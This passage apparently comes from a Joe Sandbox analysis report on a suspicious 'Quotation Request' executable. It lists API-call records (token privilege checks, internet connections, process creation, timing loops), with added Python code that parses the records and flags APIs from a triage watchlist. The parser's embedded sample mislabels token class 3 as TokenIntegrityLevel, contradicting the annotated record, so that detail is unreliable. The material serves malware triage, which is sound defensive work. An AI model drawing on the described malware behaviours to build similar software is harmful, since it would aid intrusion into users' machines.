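                out.append((c.ref, f"GetTokenInformation class {a[1]} = {TOKEN_INFO_CLASS[a[1]]}"))
        if rec and {"SetKeyboardState", "SendInput"} <= names:
            out.append((rec[0].ref, "synthesised keystrokes: SetKeyboardState + SendInput in one function"))
        if rec and {"GetTokenInformation", "LookupPrivilegeValueW"} <= names:
            out.append((rec[0].ref, "privilege check: token privileges compared against a looked-up LUID"))
    return out


if __name__ == "__main__":
    for ref, text in triage(parse_listing(SAMPLE)):
        print(f"{ref}: {text}")
```

Run as a script it prints one line per finding. Calls carried under a "Part of subcall function" line are kept in the same record but tagged with the callee address in `subcall_of`, so the caller/callee distinction the listing draws is preserved rather than flattened.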
                                                      APIs
                                                         • Part of subcall function 0082810A: GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 00828121 [class 3 is TokenPrivileges, not TokenIntegrityLevel (25); consistent with the LookupPrivilegeValueW + _memcmp check below]
                                                         • Part of subcall function 0082810A: GetLastError.KERNEL32(?,TokenPrivileges,?,00000000,?), ref: 0082812B
                                                         • Part of subcall function 0082810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenPrivileges,?,00000000,?), ref: 0082813A
                                                         • Part of subcall function 0082810A: HeapAlloc.KERNEL32(00000000,?,TokenPrivileges,?,00000000,?), ref: 00828141
                                                         • Part of subcall function 0082810A: GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,TokenPrivileges,?,00000000,?), ref: 00828157
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008286A3
                                                      • _memcmp.LIBCMT ref: 008286C6
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008286FC
                                                      • HeapFree.KERNEL32(00000000), ref: 00828703
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                      • String ID:
                                                      • API String ID: 1592001646-0
                                                      • Opcode ID: d0d7cf2cca7464dfac7bf6c523368c20a20c9d00350551d5efb40e9f54ffd573
                                                      • Instruction ID: f80778f3eb9a514ed2dc5cb8e64c791f48c69aecac4f419591eb93ca7e2f095a
                                                      • Opcode Fuzzy Hash: d0d7cf2cca7464dfac7bf6c523368c20a20c9d00350551d5efb40e9f54ffd573
                                                      • Instruction Fuzzy Hash: 47217A71E42218EFDF10DFA4D948BAEB7B8FF60315F144059E405A7281DB30AE45CB50
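Every function record on this page has the same layout: an APIs list (direct calls plus "Part of subcall function" entries made by callees), a Memory Dump Source block naming the dump and its image base, the IDA plugin snapshot, and a Similarity block with the API ID and fuzzy hashes. The parser below is an added example written for this corpus, not Joe Sandbox code: it turns one record into a structured object, strips the "Download File" link text that the page rendering fuses onto the .sdmp names, converts each call-site address to an offset from the dump's image base (useful when the dumped PE is loaded in IDA or Ghidra), and flags API names from a watchlist. The embedded sample is a copy of the GetTokenInformation / LookupPrivilegeValueW record above with two subcall lines omitted; the watchlist categories, the rva helper and all function names are assumptions of the example, not part of the report.

```python
"""Parse Joe Sandbox IDA Plugin function records (the blocks on this page) into
structured data. Added example for this corpus, not Joe Sandbox code."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Copied from the GetTokenInformation / LookupPrivilegeValueW record above (two subcall
# lines omitted). The "Download File" link text is left in so the parser shows how to strip it.
SAMPLE_RECORD = """\
APIs
  • Part of subcall function 0082810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00828121
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008286A3
• _memcmp.LIBCMT ref: 008286C6
Memory Dump Source
• Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
Similarity
• API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
• String ID:
• Instruction Fuzzy Hash: 47217A71E42218EFDF10DFA4D948BAEB7B8FF60315F144059E405A7281DB30AE45CB50
"""
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "<Name>.<MODULE>(<args>), ref: <addr>" or "<Name>.<MODULE> ref: <addr>", optional subcall prefix.
API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?(?P<name>\w+)\."
                    r"(?P<mod>\w+)(?:\((?P<args>.*)\),)? ref: (?P<ref>[0-9A-Fa-f]+)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: Optional[str]            # raw argument text; None when the plugin printed none
    ref: int                       # virtual address of the call site in the dump
    subcall: Optional[int] = None  # containing subcall function, if the call is made by a callee

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    associated: list = field(default_factory=list)
    similarity: dict = field(default_factory=dict)
    image_base: Optional[int] = None

def _clean(line: str) -> str:
    line = line.strip().lstrip("•").strip()
    return line[:-len("Download File")] if line.endswith("Download File") else line

def split_args(args: Optional[str]) -> list:
    """Split on top-level commas only, so 00000003(TokenIntegrityLevel) stays whole."""
    out, cur, depth = [], [], 0
    for ch in args or "":
        depth += (ch == "(") - (ch == ")")
        if ch == "," and depth == 0:
            out.append("".join(cur)); cur = []
        else:
            cur.append(ch)
    return out + ["".join(cur)] if args else []

def parse_record(text: str) -> FunctionRecord:
    rec, section = FunctionRecord(), None
    for line in filter(None, map(_clean, text.splitlines())):
        if line in SECTIONS:
            section = line
        elif section == "APIs":
            m = API_RE.match(line)
            if not m:
                raise ValueError(f"unrecognised API line: {line!r}")
            rec.apis.append(ApiCall(m["name"], m["mod"], m["args"], int(m["ref"], 16),
                                    int(m["sub"], 16) if m["sub"] else None))
        else:
            key, _, value = (s.strip() for s in line.partition(":"))
            if key == "Source File":   # "<dump>.sdmp, Offset: 007D0000, based on PE: true"
                base = re.search(r"Offset: ([0-9A-Fa-f]+)", value)
                rec.image_base = int(base.group(1), 16) if base else None
            elif key == "Associated":
                rec.associated.append(value)
            elif section == "Similarity":
                rec.similarity[key] = value
    return rec

def rva(rec: FunctionRecord, call: ApiCall) -> int:
    """Call-site offset from the dump's image base (helper of my own, not the report's)."""
    if rec.image_base is None:
        raise ValueError("record carries no image base")
    return call.ref - rec.image_base

# Constructed triage watchlist; an assumption for the example, not from the report.
WATCHLIST = {"token":   {"GetTokenInformation", "LookupPrivilegeValueW", "AdjustTokenPrivileges"},
             "network": {"InternetConnectW", "InternetOpenUrlW", "gethostbyname"},
             "timing":  {"QueryPerformanceCounter", "Sleep"}}

def watchlist_hits(rec: FunctionRecord, watchlist=WATCHLIST, include_subcalls=True) -> dict:
    """Watchlist tag -> sorted API names seen; drop subcall entries to see only direct calls."""
    names = {c.name for c in rec.apis if include_subcalls or c.subcall is None}
    return {tag: sorted(names & apis) for tag, apis in watchlist.items() if names & apis}

if __name__ == "__main__":
    rec = parse_record(SAMPLE_RECORD)
    for call in rec.apis:
        print(f"+{rva(rec, call):06X} {call.module}!{call.name}{split_args(call.args)}")
    print(watchlist_hits(rec), rec.similarity["Instruction Fuzzy Hash"])
```

Running the parser over every record on the page gives a table of (API ID, Instruction Fuzzy Hash, watchlist tags) that can be diffed against other AutoIt-compiled samples: the fuzzy hashes identify the shared runtime functions, so attention can go to the records whose hashes are not in the baseline. The include_subcalls switch matters for triage because a "Part of subcall function" entry only means a callee makes that API call, not that the function itself does.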
                                                      APIs
                                                      • __setmode.LIBCMT ref: 007F09AE
                                                        • Part of subcall function 007D5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00837896,?,?,00000000), ref: 007D5A2C
                                                        • Part of subcall function 007D5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00837896,?,?,00000000,?,?), ref: 007D5A50
                                                      • _fprintf.LIBCMT ref: 007F09E5
                                                      • OutputDebugStringW.KERNEL32(?), ref: 00825DBB
                                                        • Part of subcall function 007F4AAA: _flsall.LIBCMT ref: 007F4AC3
                                                      • __setmode.LIBCMT ref: 007F0A1A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                      • String ID:
                                                      • API String ID: 521402451-0
                                                      • Opcode ID: 6bcff6f03c48c85510bc77dd80171cc60f0995c086b2f37141e03be8773b90ab
                                                      • Instruction ID: b34200fe96449f876cebdd5ae7a209e8626790a9444026151663073d4b2f0485
                                                      • Opcode Fuzzy Hash: 6bcff6f03c48c85510bc77dd80171cc60f0995c086b2f37141e03be8773b90ab
                                                      • Instruction Fuzzy Hash: D7110532904208EFDB04B3B49C4E9BE7B68EF81320F244016F304A7383EE28588257E5
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008417A3
                                                        • Part of subcall function 0084182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0084184C
                                                        • Part of subcall function 0084182D: InternetCloseHandle.WININET(00000000), ref: 008418E9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Internet$CloseConnectHandleOpen
                                                      • String ID:
                                                      • API String ID: 1463438336-0
                                                      • Opcode ID: b6e044e3ad0483630772f9c960c077fbe550804325819cc14279c23aa12dc6ba
                                                      • Instruction ID: d2e54b2b05cc31d496ff1407b3af21dda75d0d32c4a2edd840202303a30fc7b6
                                                      • Opcode Fuzzy Hash: b6e044e3ad0483630772f9c960c077fbe550804325819cc14279c23aa12dc6ba
                                                      • Instruction Fuzzy Hash: EC21F036200709BFEF129F64CC04FBABBA9FF48711F10402AFA41D6651DB75D850ABA0
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,0085FAC0), ref: 00833A64
                                                      • GetLastError.KERNEL32 ref: 00833A73
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00833A82
                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0085FAC0), ref: 00833ADF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                      • String ID:
                                                      • API String ID: 2267087916-0
                                                      • Opcode ID: 49b89b77bab710aff85c8f818cfdf30e19ec14d7336fefcbe326e1a266955e8a
                                                      • Instruction ID: 19d1909ad6c1a3fdd943c9b4e08ca4cccb4716b0aa4cdb16a4c96bf96efc23c3
                                                      • Opcode Fuzzy Hash: 49b89b77bab710aff85c8f818cfdf30e19ec14d7336fefcbe326e1a266955e8a
                                                      • Instruction Fuzzy Hash: B621A6745087159F8700DF28C88586ABBE8FF95368F104A1EF499D72A2D735DE45CB82
                                                      APIs
                                                        • Part of subcall function 0082F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0082DCD3,?,?,?,0082EAC6,00000000,000000EF,00000119,?,?), ref: 0082F0CB
                                                        • Part of subcall function 0082F0BC: lstrcpyW.KERNEL32(00000000,?,?,0082DCD3,?,?,?,0082EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0082F0F1
                                                        • Part of subcall function 0082F0BC: lstrcmpiW.KERNEL32(00000000,?,0082DCD3,?,?,?,0082EAC6,00000000,000000EF,00000119,?,?), ref: 0082F122
                                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0082EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0082DCEC
                                                      • lstrcpyW.KERNEL32(00000000,?,?,0082EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0082DD12
                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,0082EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0082DD46
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: lstrcmpilstrcpylstrlen
                                                      • String ID: cdecl
                                                      • API String ID: 4031866154-3896280584
                                                      • Opcode ID: efa8b812d42d582cdfe0b67414969a843cb5734b48f9817ed2f4f4b882e64640
                                                      • Instruction ID: bf556498571aaf6d4979c49dbff4bb00f9b8628ffabf1509a9971411c09bcbec
                                                      • Opcode Fuzzy Hash: efa8b812d42d582cdfe0b67414969a843cb5734b48f9817ed2f4f4b882e64640
                                                      • Instruction Fuzzy Hash: 0111D33A200715EBDB25AF34E845D7A7BB8FF45310B40402AF906CB3A1EB759881CBD1
                                                      APIs
                                                      • _free.LIBCMT ref: 00805101
                                                        • Part of subcall function 007F571C: __FF_MSGBANNER.LIBCMT ref: 007F5733
                                                        • Part of subcall function 007F571C: __NMSG_WRITE.LIBCMT ref: 007F573A
                                                        • Part of subcall function 007F571C: RtlAllocateHeap.NTDLL(01530000,00000000,00000001,00000000,?,?,?,007F0DD3,?), ref: 007F575F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap_free
                                                      • String ID:
                                                      • API String ID: 614378929-0
                                                      • Opcode ID: b732e67cdd9135455ab5c997cdc4bc59abcf3007064f67a33913b4e8c3537120
                                                      • Instruction ID: 2492e207fe52087cc47d103128ae3d041ed0754a254adff19a717fa68ffebf4b
                                                      • Opcode Fuzzy Hash: b732e67cdd9135455ab5c997cdc4bc59abcf3007064f67a33913b4e8c3537120
                                                      • Instruction Fuzzy Hash: 9A1191B2604A19EEDBA12F74AC4977F3798FF04361B10092AFA55D6391DE3889409AA1
                                                      APIs
                                                        • Part of subcall function 007D5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00837896,?,?,00000000), ref: 007D5A2C
                                                        • Part of subcall function 007D5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00837896,?,?,00000000,?,?), ref: 007D5A50
                                                      • gethostbyname.WSOCK32(?,?,?), ref: 00846399
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 008463A4
                                                      • _memmove.LIBCMT ref: 008463D1
                                                      • inet_ntoa.WSOCK32(?), ref: 008463DC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                      • String ID:
                                                      • API String ID: 1504782959-0
                                                      • Opcode ID: 022eb0d7b5c4389523ddce02adb1247ed3c4cb8d105b680b7ccbd3b143eb1790
                                                      • Instruction ID: ff50d640809621c6ba642d5f5722bbd01ab50f76385f4e34013d31845140cf72
                                                      • Opcode Fuzzy Hash: 022eb0d7b5c4389523ddce02adb1247ed3c4cb8d105b680b7ccbd3b143eb1790
                                                      • Instruction Fuzzy Hash: FF113A36500109EFCB00FBA4DD4ACAEBBB8FF44311B144066F605E7262EB34AE14DB61
                                                      APIs
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00828B61
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00828B73
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00828B89
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00828BA4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: df0941e01ad0361ae938d1db09c215ae10c381d374fe931ef92c0d9cf26d8bbb
                                                      • Instruction ID: 117ac8b710bd11680329400da6e21226f002d6614ef3f8e686200efeeff9b103
                                                      • Opcode Fuzzy Hash: df0941e01ad0361ae938d1db09c215ae10c381d374fe931ef92c0d9cf26d8bbb
                                                      • Instruction Fuzzy Hash: B2110A79901218FFDF11DB95C885E9DBBB4FB48710F204095EA00B7250DA716E51DB94
                                                      APIs
                                                        • Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623
                                                      • DefDlgProcW.USER32(?,00000020,?), ref: 007D12D8
                                                      • GetClientRect.USER32(?,?), ref: 0080B5FB
                                                      • GetCursorPos.USER32(?), ref: 0080B605
                                                      • ScreenToClient.USER32(?,?), ref: 0080B610
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                      • String ID:
                                                      • API String ID: 4127811313-0
                                                      • Opcode ID: 7a7d3f9951210fcb023d45a55107bafa58ad123473b3715b65348008358e36db
                                                      • Instruction ID: 5ea407b81af1a5d821a9aec916b1701563e3b4646d3d137e86143b8f322cc706
                                                      • Opcode Fuzzy Hash: 7a7d3f9951210fcb023d45a55107bafa58ad123473b3715b65348008358e36db
                                                      • Instruction Fuzzy Hash: 9F112535A00119FBCB10EFA8D8899AE77B9FB05301F900466FA01E7241D739BA55CBA5
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0082FCED,?,00830D40,?,00008000), ref: 0083115F
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0082FCED,?,00830D40,?,00008000), ref: 00831184
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0082FCED,?,00830D40,?,00008000), ref: 0083118E
                                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,0082FCED,?,00830D40,?,00008000), ref: 008311C1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CounterPerformanceQuerySleep
                                                      • String ID:
                                                      • API String ID: 2875609808-0
                                                      • Opcode ID: b42af3b1f608c81bc69053e8659ac2801e4c172b9708808ce14567650d7ae3ef
                                                      • Instruction ID: bbd73207e886ac8118f0d47adefe1b6800c25dbd7bdcb9fd70f2977e07cc5c6d
                                                      • Opcode Fuzzy Hash: b42af3b1f608c81bc69053e8659ac2801e4c172b9708808ce14567650d7ae3ef
                                                      • Instruction Fuzzy Hash: 3E113C31D41A1DD7CF00AFA5D848AEEBB78FF49B11F004055EA41F2241CB749560CBD5
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0082D84D
                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0082D864
                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0082D879
                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0082D897
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                      • String ID:
                                                      • API String ID: 1352324309-0
                                                      • Opcode ID: a04029876c0fe7f5f943504c25fde7315d21f37544cb55c66680160140ad6422
                                                      • Instruction ID: 622398818522acb87b1fa5d25d201a0dd5b87e50e9f0fe2051b91147149ec246
                                                      • Opcode Fuzzy Hash: a04029876c0fe7f5f943504c25fde7315d21f37544cb55c66680160140ad6422
                                                      • Instruction Fuzzy Hash: FC115EB5605329DBE3208F50EC08F93BBBCFB00B04F108979AA56D6051D7B4E5899BA5
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 0085B2E4
                                                      • ScreenToClient.USER32(?,?), ref: 0085B2FC
                                                      • ScreenToClient.USER32(?,?), ref: 0085B320
                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0085B33B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                      • String ID:
                                                      • API String ID: 357397906-0
                                                      APIs
                                                      • _memset.LIBCMT ref: 0085B644
                                                      • _memset.LIBCMT ref: 0085B653
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00896F20,00896F64), ref: 0085B682
                                                      • CloseHandle.KERNEL32 ref: 0085B694
                                                      Similarity
                                                      • API ID: _memset$CloseCreateHandleProcess
                                                      • String ID:
                                                      • API String ID: 3277943733-0
                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(?), ref: 00836BE6
                                                        • Part of subcall function 008376C4: _memset.LIBCMT ref: 008376F9
                                                      • _memmove.LIBCMT ref: 00836C09
                                                      • _memset.LIBCMT ref: 00836C16
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00836C26
                                                      Similarity
                                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                                      • String ID:
                                                      • API String ID: 48991266-0
                                                      APIs
                                                      • GetSysColor.USER32(00000008), ref: 007D2231
                                                      • SetTextColor.GDI32(?,000000FF), ref: 007D223B
                                                      • SetBkMode.GDI32(?,00000001), ref: 007D2250
                                                      • GetStockObject.GDI32(00000005), ref: 007D2258
                                                      • GetWindowDC.USER32(?,00000000), ref: 0080BE83
                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0080BE90
